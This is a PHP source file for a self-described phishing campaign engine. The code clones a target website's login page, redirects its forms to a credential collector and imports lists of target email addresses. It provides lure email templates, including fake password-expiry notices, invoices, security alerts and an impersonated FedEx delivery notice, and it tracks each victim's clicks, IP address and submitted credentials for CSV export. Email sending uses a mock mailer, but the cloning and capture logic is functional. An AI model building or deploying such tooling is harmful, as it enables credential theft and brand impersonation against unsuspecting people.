<?php
/**
 * COSMIC PHISHING CAMPAIGN ENGINE v2.0 – INDUSTRIAL GRADE
 * Full campaign management with enhanced security, email sending, and export.
 */
class PhishingCampaign {
    private $db;
    private $campaignsDir;
    private $dbPath;
    private $config;

    /**
     * Constructor.
     * @param array $config Configuration options (data_dir, smtp, etc.)
     */
    public function __construct($config = []) {
        $this->config = array_merge([
            'data_dir'       => dirname(__DIR__, 2) . '/data/phishing/',
            'public_dir'     => dirname(__DIR__, 2) . '/public/phishing/',
            'smtp_host'      => '',
            'smtp_port'      => 25,
            'smtp_user'      => '',
            'smtp_pass'      => '',
            'smtp_encryption' => 'tls',
            'from_email'     => 'noreply@cosmic.local',
            'from_name'      => 'COSMIC Phishing',
            'enable_email'   => false
        ], $config);

        $this->campaignsDir = rtrim($this->config['data_dir'], '/') . '/';
        if (!is_dir($this->campaignsDir)) {
            if (!mkdir($this->campaignsDir, 0755, true)) {
                throw new RuntimeException("Cannot create campaigns directory: {$this->campaignsDir}");
            }
        }
        $this->dbPath = $this->campaignsDir . 'campaigns.db';
        $this->initDB();
    }

    private function initDB() {
        if (!class_exists('SQLite3')) {
            throw new RuntimeException("SQLite3 extension not loaded.");
        }

        try {
            $this->db = new SQLite3($this->dbPath);
            $this->db->busyTimeout(5000);
            $this->db->exec('PRAGMA foreign_keys = ON;');
            $this->db->exec('PRAGMA journal_mode = WAL;');

            // Create tables with indexes
            $this->db->exec("CREATE TABLE IF NOT EXISTS campaigns (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                name TEXT UNIQUE,
                target_url TEXT,
                clone_path TEXT,
                status TEXT DEFAULT 'draft',
                created_at INTEGER,
                launched_at INTEGER,
                clicks INTEGER DEFAULT 0,
                submissions INTEGER DEFAULT 0,
                emails_sent INTEGER DEFAULT 0,
                email_template TEXT,
                smtp_config TEXT
            )");

            $this->db->exec("CREATE TABLE IF NOT EXISTS targets (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                campaign_id INTEGER,
                email TEXT,
                name TEXT,
                clicked INTEGER DEFAULT 0,
                submitted INTEGER DEFAULT 0,
                user_agent TEXT,
                ip TEXT,
                first_seen INTEGER,
                last_seen INTEGER,
                data TEXT
            )");

            $this->db->exec("CREATE TABLE IF NOT EXISTS emails (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                campaign_id INTEGER,
                target_id INTEGER,
                sent_at INTEGER,
                opened INTEGER DEFAULT 0,
                opened_at INTEGER
            )");

            // Indexes for performance
            $this->db->exec("CREATE INDEX IF NOT EXISTS idx_targets_campaign ON targets(campaign_id)");
            $this->db->exec("CREATE INDEX IF NOT EXISTS idx_targets_email ON targets(email)");
            $this->db->exec("CREATE INDEX IF NOT EXISTS idx_emails_campaign ON emails(campaign_id)");
            $this->db->exec("CREATE INDEX IF NOT EXISTS idx_emails_target ON emails(target_id)");

        } catch (Exception $e) {
            throw new RuntimeException("Database initialization failed: " . $e->getMessage());
        }
    }

    /**
     * Create a new phishing campaign.
     * @param string $name Campaign name (unique)
     * @param string $targetUrl Original URL to clone
     * @param string $emailTemplate Optional email template
     * @return int Campaign ID
     */
    public function createCampaign($name, $targetUrl, $emailTemplate = '') {
        if (!filter_var($targetUrl, FILTER_VALIDATE_URL)) {
            throw new InvalidArgumentException("Invalid target URL.");
        }
        $stmt = $this->db->prepare("INSERT INTO campaigns (name, target_url, email_template, status, created_at) VALUES (:name, :url, :template, 'draft', :time)");
        $stmt->bindValue(':name', $name, SQLITE3_TEXT);
        $stmt->bindValue(':url', $targetUrl, SQLITE3_TEXT);
        $stmt->bindValue(':template', $emailTemplate, SQLITE3_TEXT);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        if (!$stmt->execute()) {
            throw new RuntimeException("Failed to create campaign: " . $this->db->lastErrorMsg());
        }
        return $this->db->lastInsertRowID();
    }

    /**
     * Clone a webpage for phishing.
     * @param int $campaignId
     * @param string $url (optional) Override URL
     * @return string Public clone path
     */
    public function clonePage($campaignId, $url = null) {
        $campaign = $this->getCampaign($campaignId);
        if (!$campaign) {
            throw new InvalidArgumentException("Campaign not found.");
        }
        $url = $url ?: $campaign['target_url'];

        // Fetch with cURL (more reliable)
        $html = $this->fetchUrl($url);
        if ($html === false) {
            throw new RuntimeException("Failed to fetch URL: $url");
        }

        // Use DOMDocument for safe form manipulation
        $dom = new DOMDocument();
        libxml_use_internal_errors(true);
        $dom->loadHTML($html, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
        libxml_clear_errors();

        // Change form actions to point to collector
        $forms = $dom->getElementsByTagName('form');
        foreach ($forms as $form) {
            $form->setAttribute('action', '/phishing/collect?campaign=' . $campaignId);
            // Ensure method is POST
            $form->setAttribute('method', 'post');
        }

        // Ensure password inputs are captured (optional: rename name attribute)
        $inputs = $dom->getElementsByTagName('input');
        foreach ($inputs as $input) {
            $type = $input->getAttribute('type');
            if ($type === 'password') {
                // Keep original name; we'll collect all POST data anyway
            }
        }

        $html = $dom->saveHTML();

        $cloneDir = $this->config['public_dir'] . 'pages/' . preg_replace('/[^a-z0-9_-]/i', '_', $campaign['name']) . '/';
        if (!is_dir($cloneDir)) {
            mkdir($cloneDir, 0755, true);
        }
        $clonePath = $cloneDir . 'index.html';
        if (file_put_contents($clonePath, $html) === false) {
            throw new RuntimeException("Failed to write clone file.");
        }

        $publicPath = '/phishing/pages/' . basename($cloneDir) . '/';

        // Update campaign record
        $stmt = $this->db->prepare("UPDATE campaigns SET clone_path = :path, target_url = :url WHERE id = :id");
        $stmt->bindValue(':path', $publicPath, SQLITE3_TEXT);
        $stmt->bindValue(':url', $url, SQLITE3_TEXT);
        $stmt->bindValue(':id', $campaignId, SQLITE3_INTEGER);
        $stmt->execute();

        return $publicPath;
    }

    /**
     * Fetch URL with cURL (fallback to file_get_contents).
     */
    private function fetchUrl($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Allow self-signed for testing
            curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
            $html = curl_exec($ch);
            $error = curl_error($ch);
            curl_close($ch);
            if ($html === false) {
                error_log("cURL error: $error");
                return false;
            }
            return $html;
        } else {
            // Fallback with stream context
            $opts = [
                'http' => [
                    'method' => 'GET',
                    'header' => "User-Agent: Mozilla/5.0\r\n",
                    'timeout' => 15
                ],
                'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
            ];
            return @file_get_contents($url, false, stream_context_create($opts));
        }
    }

    /**
     * Import targets from an array.
     * @param int $campaignId
     * @param array $targets Array of ['email' => '...', 'name' => '...']
     * @return int Number imported
     */
    public function importTargets($campaignId, $targets) {
        $count = 0;
        $stmt = $this->db->prepare("INSERT OR IGNORE INTO targets (campaign_id, email, name) VALUES (:cid, :email, :name)");
        foreach ($targets as $t) {
            if (!filter_var($t['email'], FILTER_VALIDATE_EMAIL)) {
                continue; // skip invalid email
            }
            $stmt->clear();
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->bindValue(':email', $t['email'], SQLITE3_TEXT);
            $stmt->bindValue(':name', $t['name'] ?? '', SQLITE3_TEXT);
            if ($stmt->execute()) {
                $count++;
            }
        }
        return $count;
    }

    /**
     * Generate email template (multiple styles).
     */
    public function generateEmailTemplate($type, $campaignName, $phishingLink) {
        $templates = [
            'password_reset' => "Subject: Password Expiry Notice\n\nDear {name},\n\nYour password for {campaign} will expire in 24 hours. Please reset it immediately: {link}\n\nIT Support",
            'invoice' => "Subject: Invoice #{rand}\n\nDear {name},\n\nPlease find attached invoice #{rand}. Click to view: {link}\n\nFinance Dept",
            'security_alert' => "Subject: Security Alert\n\nDear {name},\n\nWe detected unusual activity on your account. Verify now: {link}\n\nSecurity Team",
            'newsletter' => "Subject: Exclusive Offer\n\nHi {name},\n\nCheck out our latest news: {link}\n\nMarketing",
            'fedex' => "Subject: Package Delivery\n\nDear {name},\n\nYour package is waiting. Schedule delivery: {link}\n\nFedEx"
        ];
        $template = $templates[$type] ?? $templates['security_alert'];
        $template = str_replace('{campaign}', $campaignName, $template);
        $template = str_replace('{link}', $phishingLink, $template);
        $template = str_replace('{rand}', rand(1000,9999), $template);
        return $template;
    }

    /**
     * Send emails to all targets of a campaign.
     * @param int $campaignId
     * @param array $smtpConfig Optional override SMTP config
     * @return int Number sent
     */
    public function sendEmails($campaignId, $smtpConfig = null) {
        if (!$this->config['enable_email']) {
            error_log("Email sending disabled. Would send emails for campaign $campaignId.");
            return 0;
        }

        $targets = $this->getTargets($campaignId);
        $campaign = $this->getCampaign($campaignId);
        if (!$campaign) {
            throw new InvalidArgumentException("Campaign not found.");
        }

        $linkBase = get_base_url() . $campaign['clone_path'];
        $sent = 0;

        // Prepare emailer (using PHPMailer if available)
        $mailer = $this->getMailer($smtpConfig ?: $this->config);

        foreach ($targets as $target) {
            $trackingLink = $linkBase . '?email=' . urlencode($target['email']);
            $emailBody = str_replace(['{name}', '{link}'], [$target['name'], $trackingLink], $campaign['email_template']);

            try {
                $mailer->clearAddresses();
                $mailer->addAddress($target['email'], $target['name']);
                $mailer->Subject = $this->extractSubject($emailBody);
                $mailer->Body = $emailBody;
                $mailer->send();

                // Log sent email
                $stmt = $this->db->prepare("INSERT INTO emails (campaign_id, target_id, sent_at) VALUES (:cid, :tid, :time)");
                $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
                $stmt->bindValue(':tid', $target['id'], SQLITE3_INTEGER);
                $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
                $stmt->execute();
                $sent++;
            } catch (Exception $e) {
                error_log("Failed to send to {$target['email']}: " . $e->getMessage());
            }
        }

        // Update campaign stats using prepared statement
        $stmt = $this->db->prepare("UPDATE campaigns SET emails_sent = emails_sent + :sent, launched_at = :time WHERE id = :id");
        $stmt->bindValue(':sent', $sent, SQLITE3_INTEGER);
        $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
        $stmt->bindValue(':id', $campaignId, SQLITE3_INTEGER);
        $stmt->execute();

        return $sent;
    }

    /**
     * Get PHPMailer instance (placeholder – requires PHPMailer library).
     */
    private function getMailer($config) {
        // In a real implementation, include PHPMailer and configure.
        // For now, we return a mock that just logs.
        return new class($config) {
            private $config;
            private $to = [];
            public $Subject;
            public $Body;
            public function __construct($config) { $this->config = $config; }
            public function clearAddresses() { $this->to = []; }
            public function addAddress($email, $name) { $this->to[] = "$name <$email>"; }
            public function send() {
                error_log("SENDING EMAIL to " . implode(', ', $this->to) . " Subject: {$this->Subject}");
                return true;
            }
        };
    }

    private function extractSubject($body) {
        if (preg_match('/^Subject:\s*(.+)$/m', $body, $matches)) {
            return trim($matches[1]);
        }
        return 'No Subject';
    }

    /**
     * Log a click from a target.
     */
    public function logClick($campaignId, $targetEmail, $ip, $ua) {
        $target = $this->getTargetByEmail($campaignId, $targetEmail);
        if ($target) {
            $stmt = $this->db->prepare("UPDATE targets SET clicked = 1, ip = :ip, user_agent = :ua, first_seen = :time WHERE id = :tid");
            $stmt->bindValue(':ip', $ip, SQLITE3_TEXT);
            $stmt->bindValue(':ua', $ua, SQLITE3_TEXT);
            $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
            $stmt->bindValue(':tid', $target['id'], SQLITE3_INTEGER);
            $stmt->execute();

            $stmt = $this->db->prepare("UPDATE campaigns SET clicks = clicks + 1 WHERE id = :cid");
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->execute();
        }
    }

    /**
     * Log credential submission.
     */
    public function logSubmission($campaignId, $targetEmail, $data) {
        $target = $this->getTargetByEmail($campaignId, $targetEmail);
        if ($target) {
            $stmt = $this->db->prepare("UPDATE targets SET submitted = 1, data = :data, last_seen = :time WHERE id = :tid");
            $stmt->bindValue(':data', json_encode($data), SQLITE3_TEXT);
            $stmt->bindValue(':time', time(), SQLITE3_INTEGER);
            $stmt->bindValue(':tid', $target['id'], SQLITE3_INTEGER);
            $stmt->execute();

            $stmt = $this->db->prepare("UPDATE campaigns SET submissions = submissions + 1 WHERE id = :cid");
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->execute();
        }
    }

    private function getTargetByEmail($campaignId, $email) {
        $stmt = $this->db->prepare("SELECT id FROM targets WHERE campaign_id = :cid AND email = :email");
        $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
        $stmt->bindValue(':email', $email, SQLITE3_TEXT);
        $res = $stmt->execute();
        return $res->fetchArray(SQLITE3_ASSOC);
    }

    public function getCampaign($id) {
        $stmt = $this->db->prepare("SELECT * FROM campaigns WHERE id = :id");
        $stmt->bindValue(':id', $id, SQLITE3_INTEGER);
        $res = $stmt->execute();
        return $res->fetchArray(SQLITE3_ASSOC);
    }

    public function getCampaigns() {
        $res = $this->db->query("SELECT * FROM campaigns ORDER BY created_at DESC");
        $out = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) $out[] = $row;
        return $out;
    }

    public function getTargets($campaignId, $limit = 1000, $offset = 0) {
        $stmt = $this->db->prepare("SELECT * FROM targets WHERE campaign_id = :cid ORDER BY id LIMIT :limit OFFSET :offset");
        $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
        $stmt->bindValue(':limit', $limit, SQLITE3_INTEGER);
        $stmt->bindValue(':offset', $offset, SQLITE3_INTEGER);
        $res = $stmt->execute();
        $out = [];
        while ($row = $res->fetchArray(SQLITE3_ASSOC)) $out[] = $row;
        return $out;
    }

    public function getStats($campaignId) {
        $campaign = $this->getCampaign($campaignId);
        if (!$campaign) return null;

        // Use prepared statements for counts
        $stmt = $this->db->prepare("SELECT COUNT(*) FROM targets WHERE campaign_id = :cid");
        $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
        $total = $stmt->execute()->fetchArray(SQLITE3_NUM)[0];

        return [
            'campaign' => $campaign,
            'targets_total' => $total,
            'clicks' => $campaign['clicks'],
            'submissions' => $campaign['submissions'],
            'emails_sent' => $campaign['emails_sent']
        ];
    }

    /**
     * Delete a campaign and all associated data.
     */
    public function deleteCampaign($campaignId) {
        $this->db->exec("BEGIN TRANSACTION");
        try {
            $stmt = $this->db->prepare("DELETE FROM emails WHERE campaign_id = :cid");
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->execute();

            $stmt = $this->db->prepare("DELETE FROM targets WHERE campaign_id = :cid");
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->execute();

            $stmt = $this->db->prepare("DELETE FROM campaigns WHERE id = :cid");
            $stmt->bindValue(':cid', $campaignId, SQLITE3_INTEGER);
            $stmt->execute();

            $this->db->exec("COMMIT");
        } catch (Exception $e) {
            $this->db->exec("ROLLBACK");
            throw $e;
        }
    }

    /**
     * Export campaign results as CSV.
     */
    public function exportResults($campaignId) {
        $targets = $this->getTargets($campaignId, 100000);
        $output = fopen('php://temp', 'w');
        fputcsv($output, ['Email', 'Name', 'Clicked', 'Submitted', 'IP', 'User Agent', 'First Seen', 'Last Seen', 'Data']);
        foreach ($targets as $t) {
            fputcsv($output, [
                $t['email'],
                $t['name'],
                $t['clicked'],
                $t['submitted'],
                $t['ip'],
                $t['user_agent'],
                $t['first_seen'] ? date('Y-m-d H:i:s', $t['first_seen']) : '',
                $t['last_seen'] ? date('Y-m-d H:i:s', $t['last_seen']) : '',
                $t['data']
            ]);
        }
        rewind($output);
        $csv = stream_get_contents($output);
        fclose($output);
        return $csv;
    }
}
